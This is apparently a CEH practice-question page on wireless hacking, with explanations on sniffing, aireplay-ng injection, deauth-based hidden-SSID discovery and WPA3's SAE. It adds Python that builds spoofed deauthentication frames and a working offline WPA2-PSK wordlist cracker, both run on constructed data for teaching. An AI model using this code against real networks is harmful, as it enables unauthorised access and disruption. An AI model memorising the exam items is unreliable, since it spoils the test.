Wireless Network Hacking for Certified Ethical Hacker (CEH)

This page covers the Wireless Network Hacking domain of the Certified Ethical Hacker (CEH) certification. Master Cybersecurity offers 27 practice questions in this domain, drawn from the same content we use across our timed exam simulations. Below are five sample questions with full answer explanations.

Sample Practice Questions

  Question 1

    Which of the following is a potential risk of using unencrypted Wi-Fi networks?
    A. Increased network speed
    B. Vulnerability to sniffing attacks
    C. Automatic software updates
    D. Improved signal range
    Explanation

    The correct answer is: B. Vulnerability to sniffing attacks.

    An open (unencrypted) Wi-Fi network sends every frame in plaintext. Anyone within radio range with a wireless adapter in monitor mode can capture that traffic and read whatever the application layer does not itself encrypt: credentials, email, web content and other sensitive data. Even where sites use HTTPS, DNS queries and the TLS SNI hostname still reveal which services each client is talking to. So the main risk is vulnerability to sniffing attacks (B). WEP networks are technically encrypted, but the cipher is broken and the key can be recovered from captured traffic in minutes, so in practice they are treated the same way as open networks. Increased speed (A), automatic updates (C) and improved range (D) are not security risks, and they are not benefits of going unencrypted either: WPA2/WPA3 encryption has no meaningful effect on throughput or range on modern hardware. The primary security risk of unencrypted Wi-Fi is sniffing.
  Question 2

    You are testing a company's wireless network security and want to generate a unique packet injection to test the network's response. Which tool would you ideally use to perform this action?
    A. airmon-ng
    B. aireplay-ng
    C. airodump-ng
    D. airdecap-ng
    Explanation

    The correct answer is: B. aireplay-ng.

    aireplay-ng is the Aircrack-ng suite tool for injecting frames into a wireless network. You use it to send crafted or replayed frames to test how the access point and clients respond: an injection test (aireplay-ng -9), deauthentication (-0/--deauth), fake authentication (-1/--fakeauth) and ARP request replay (-3/--arpreplay) are the common modes. It needs an interface already in monitor mode and a driver that supports injection, which is why the -9 test is usually run first. airmon-ng (A) only puts the interface into monitor mode; it does not inject. airodump-ng (C) captures and displays traffic; it does not inject. airdecap-ng (D) decrypts captured packets when you have the key; it does not inject. For packet injection, use aireplay-ng.
  Question 3

    In a penetration testing scenario, you are able to sniff traffic on a wireless network. Which of the following can help you identify the presence of hidden SSIDs?
    A. Aircrack-ng
    B. Kismet
    C. Ettercap
    D. Netcat
    Explanation

    The correct answer is: B. Kismet.

    Kismet is a wireless IDS/sniffer that passively monitors 802.11 traffic. When SSID broadcast is disabled ("hidden"), the access point still beacons, but with an empty SSID element; the real SSID is still sent in the clear in probe requests/responses and in association and reassociation frames whenever a client connects. Kismet captures those frames and fills in the network name as soon as it sees one, so it reveals hidden SSIDs from observed client activity without transmitting anything. Aircrack-ng (A) is mainly for cracking keys and capturing handshakes; its airodump-ng component shows a hidden network as "<length: N>" until a client associates, but Kismet is the tool the exam cites for identifying hidden SSIDs from sniffed traffic. Ettercap (C) is for LAN MITM, not wireless SSID discovery. Netcat (D) is a general network utility. For identifying hidden SSIDs from sniffed traffic, Kismet is the appropriate tool.
  Question 4

    Which of the following techniques would be most effective for an ethical hacker to discover hidden SSIDs during a wireless network assessment?
    A. Deauthentication attack
    B. MAC address filtering
    C. Signal jamming
    D. Evil twin attack
    Explanation

    The correct answer is: A. Deauthentication attack.

    Hidden SSIDs are not carried in beacons, but the SSID is still sent in probe requests and in association/reassociation frames when clients connect. A deauthentication attack sends forged deauth frames, spoofed from the access point's BSSID, to disconnect clients; when they reconnect they transmit probe requests and (re)association frames that include the SSID. By capturing traffic during that reconnection (for example airodump-ng on the AP's channel while aireplay-ng --deauth runs against the BSSID), you recover the hidden SSID within seconds instead of waiting for a client to join on its own. Two caveats matter in practice: deauthentication is a denial of service and must be inside the engagement's authorized scope, and where the network enforces 802.11w Protected Management Frames (optional in WPA2, mandatory in WPA3) clients reject unauthenticated deauth frames, so the fallback is passive sniffing until a natural reconnection. MAC address filtering (B) restricts which devices can connect; it does not reveal SSIDs. Signal jamming (C) disrupts the network indiscriminately and is usually out of scope. Evil twin (D) lures clients to a fake AP; it can expose an SSID when clients try to connect, but it is not the primary technique for discovering hidden SSIDs. A deauthentication attack is the most effective technique to force reconnections and capture the hidden SSID.
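The following is an added example and is not part of the original page or of the Aircrack-ng or Kismet projects. It builds constructed 802.11 management frames in pure Python (no capture hardware needed) to show the three things Questions 2 to 4 rely on: a beacon from a hidden network carries a zero-length SSID element, a deauthentication frame like the ones aireplay-ng injects is just the 24-byte management header plus a two-byte reason code, and the client's association request after it reconnects carries the SSID in the clear. The BSSID, client MAC, SSID and every frame below are made up for the example; the frame layout and element IDs are the standard 802.11 ones.

```python
import struct

# Management-frame subtypes used here (802.11 type 0)
MGMT_SUBTYPES = {0: "assoc-req", 2: "reassoc-req", 4: "probe-req",
                 5: "probe-resp", 8: "beacon", 12: "deauth"}
SSID_IE = 0      # element ID of the SSID information element
RATES_IE = 1     # supported rates element
# Fixed-field bytes that precede the information elements, per subtype
FIXED_FIELDS = {0: 4, 2: 10, 4: 0, 5: 12, 8: 12}


def mac(text):
    return bytes.fromhex(text.replace(":", ""))


def mgmt_header(subtype, dst, src, bssid, seq=0):
    # Frame Control: protocol 0, type 0 (management), subtype in bits 4-7, no flags
    frame_control = subtype << 4
    return struct.pack("<HH6s6s6sH", frame_control, 0, dst, src, bssid, seq << 4)


def ie(tag, value):
    return bytes([tag, len(value)]) + value


def build_beacon(bssid, ssid, hidden=False):
    # Timestamp(8) + beacon interval(2) + capabilities(2), then the elements
    body = b"\x00" * 8 + struct.pack("<HH", 100, 0x0411)
    body += ie(SSID_IE, b"" if hidden else ssid)   # hidden AP: zero-length SSID
    body += ie(RATES_IE, bytes([0x82, 0x84, 0x8B, 0x96]))
    return mgmt_header(8, b"\xff" * 6, bssid, bssid) + body


def build_assoc_req(client, bssid, ssid):
    # Capabilities(2) + listen interval(2); the SSID element is mandatory here
    body = struct.pack("<HH", 0x0411, 10)
    body += ie(SSID_IE, ssid) + ie(RATES_IE, bytes([0x82, 0x84, 0x8B, 0x96]))
    return mgmt_header(0, bssid, client, bssid) + body


def build_deauth(client, bssid, reason=7):
    # What aireplay-ng --deauth sends: spoofed from the AP toward the client.
    # Reason 7 = class 3 frame received from a non-associated station.
    return mgmt_header(12, client, bssid, bssid) + struct.pack("<H", reason)


def parse(frame):
    fc, _dur, a1, a2, a3, _seq = struct.unpack_from("<HH6s6s6sH", frame)
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0:
        return None                       # not a management frame
    info = {"subtype": MGMT_SUBTYPES.get(subtype, subtype),
            "dst": a1, "src": a2, "bssid": a3}
    body = frame[24:]
    if subtype == 12:
        info["reason"] = struct.unpack_from("<H", body)[0]
        return info
    if subtype not in FIXED_FIELDS:
        return info
    pos = FIXED_FIELDS[subtype]
    while pos + 2 <= len(body):
        tag, length = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + length]
        if tag == SSID_IE:
            # Hidden networks beacon a zero-length SSID; some firmware instead sends
            # the real length filled with NUL bytes. Treat both as hidden.
            info["ssid"] = None if value.strip(b"\x00") == b"" else value.decode("utf-8", "replace")
        pos += 2 + length
    return info


def discover_ssids(frames):
    """Replay a capture in order: a beacon registers the BSSID (SSID unknown if
    hidden); a later probe/association frame from a reconnecting client fills it in."""
    known = {}
    for frame in frames:
        info = parse(frame)
        if info is None or "ssid" not in info:
            continue
        if info["ssid"] is not None:
            known[info["bssid"]] = info["ssid"]
        else:
            known.setdefault(info["bssid"], None)
    return known


# Constructed sample capture: hidden beacon, injected deauth, client re-association
AP = mac("00:11:22:33:44:55")
CLIENT = mac("66:77:88:99:aa:bb")
CAPTURE = [
    build_beacon(AP, b"CorpNet", hidden=True),
    build_deauth(CLIENT, AP),
    build_assoc_req(CLIENT, AP, b"CorpNet"),
]

if __name__ == "__main__":
    print("beacon only:", discover_ssids(CAPTURE[:1]))
    print("after reconnect:", discover_ssids(CAPTURE))
```

Run it and the first dictionary maps the BSSID to None (the network is visible but nameless, which is what airodump-ng renders as "<length: N>"); after the deauth and the association request the same BSSID maps to "CorpNet". The deauth frame itself carries no SSID, which is the point: it only forces the client to send the frame that does.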
  Question 5

    Which of the following is a primary benefit of using WPA3 over WPA2 in wireless networks?
    A. Increased data transfer speeds
    B. Simplified network configuration
    C. Enhanced protection against brute-force attacks
    D. Backward compatibility with WEP devices
    Explanation

    The correct answer is: C. Enhanced protection against brute-force attacks.

    WPA3-Personal replaces the WPA2-PSK handshake with SAE (Simultaneous Authentication of Equals), also known as Dragonfly. With WPA2-PSK, the pairwise master key is derived directly from the passphrase and the captured 4-way handshake contains a MIC the attacker can recompute for every guess, so one captured handshake enables unlimited offline dictionary attacks. SAE is a password-authenticated key exchange: the captured exchange gives an attacker nothing to test guesses against offline, and each guess requires a live exchange with the access point, which can be rate-limited. SAE also provides forward secrecy for the session keys, and WPA3 mandates Protected Management Frames. So a primary benefit of WPA3 is enhanced protection against brute-force attacks (C). Speed (A) and configuration (B) are not security improvements. WEP compatibility (D) is not a WPA3 feature; WPA3 does not aim for WEP backward compatibility. The main security benefit of WPA3 over WPA2 is brute-force resistance via SAE, which still does not excuse a weak passphrase, since online guessing remains possible.
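To make the WPA2 side of that comparison concrete, here is an added example (not from the page's authors) that reproduces the WPA2-PSK key derivation and shows why a captured 4-way handshake permits offline guessing: the attacker derives the key confirmation key for each candidate passphrase and recomputes the MIC of EAPOL message 2 until one matches the captured value. The SSID, MAC addresses, nonces, EAPOL frame and wordlist are all constructed for the example; the PBKDF2, PRF-512 and MIC steps are the standard WPA2 ones from 802.11i. Under SAE there is no such passphrase-derived value in the captured exchange, which is exactly the brute-force protection the question asks about.

```python
import hashlib
import hmac
import struct

MIC_OFFSET = 81   # 802.1X header (4) + Key Descriptor fields before the Key MIC (77)


def pmk_from_passphrase(passphrase, ssid):
    # WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    # PRF-512 from 802.11i: HMAC-SHA1 in counter mode over the sorted MACs and nonces
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]   # KCK = bytes 0-15, KEK = 16-31, TK = 32-47


def eapol_mic(kck, eapol):
    # WPA2/CCMP: MIC = HMAC-SHA1(KCK, EAPOL-Key frame with the MIC field zeroed)[:16]
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce, mic=b"\x00" * 16):
    # Constructed EAPOL-Key message 2 of the 4-way handshake (RSN descriptor type 2)
    key = bytes([2]) + struct.pack(">HHQ", 0x010A, 0, 1) + snonce   # type, key info, key len, replay ctr, SNonce
    key += b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8                 # Key IV, Key RSC, Key ID
    key += mic + struct.pack(">H", 0)                               # Key MIC, Key Data Length
    return bytes([2, 3]) + struct.pack(">H", len(key)) + key        # 802.1X version 2, type EAPOL-Key


def crack_psk(eapol, ap_mac, sta_mac, anonce, snonce, ssid, wordlist):
    """Offline guess: derive the KCK for each candidate and compare the MIC.
    Nothing is sent to the network; only the captured data is used."""
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for guess in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(guess, ssid),
                           ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), captured_mic):
            return guess
    return None


# Constructed scenario (not a real capture)
SSID = b"CorpNet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "Summer2019!"
WORDLIST = ["password", "Summer2018!", "Summer2019!", "letmein"]


def captured_msg2():
    # What a sniffer records: message 2 carrying the MIC the real client computed
    kck = ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID),
                       AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    unsigned = build_eapol_msg2(SNONCE)
    return build_eapol_msg2(SNONCE, eapol_mic(kck, unsigned))


if __name__ == "__main__":
    print("recovered:", crack_psk(captured_msg2(), AP_MAC, STA_MAC,
                                  ANONCE, SNONCE, SSID, WORDLIST))
```

Each guess costs one PBKDF2 run of 4096 SHA-1 iterations plus four HMACs, which is why GPU crackers reach millions of WPA2 guesses per second against a single capture, and why the SSID doubles as a salt: the same wordlist has to be recomputed for every network name. The attacker never needs the access point again after the handshake is captured.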
